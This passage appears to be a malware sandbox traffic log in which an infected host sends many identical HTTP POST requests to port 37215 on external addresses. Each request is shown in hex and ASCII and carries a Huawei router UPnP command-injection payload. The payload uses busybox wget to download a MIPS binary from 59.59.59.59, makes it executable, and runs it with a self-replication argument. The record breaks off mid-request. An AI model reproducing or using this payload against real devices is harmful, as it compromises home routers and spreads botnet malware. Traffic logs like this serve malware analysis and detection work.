20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1224192.168.2.1540824195.238.244.13537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.732702971 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1225192.168.2.155977635.223.203.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.732722044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1226192.168.2.1556374197.229.169.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.732744932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1227192.168.2.1536198197.174.174.12037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.759908915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1228192.168.2.1549600157.61.152.9737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.759949923 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1229192.168.2.1543404157.214.209.8737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.759975910 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1230192.168.2.1555078124.139.109.13937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.760004044 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1231192.168.2.155997241.148.107.17437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.760009050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1232192.168.2.1558266115.154.0.4437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.760032892 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1233192.168.2.155405841.26.119.1137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.760062933 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1234192.168.2.155602217.85.83.14037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.760067940 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
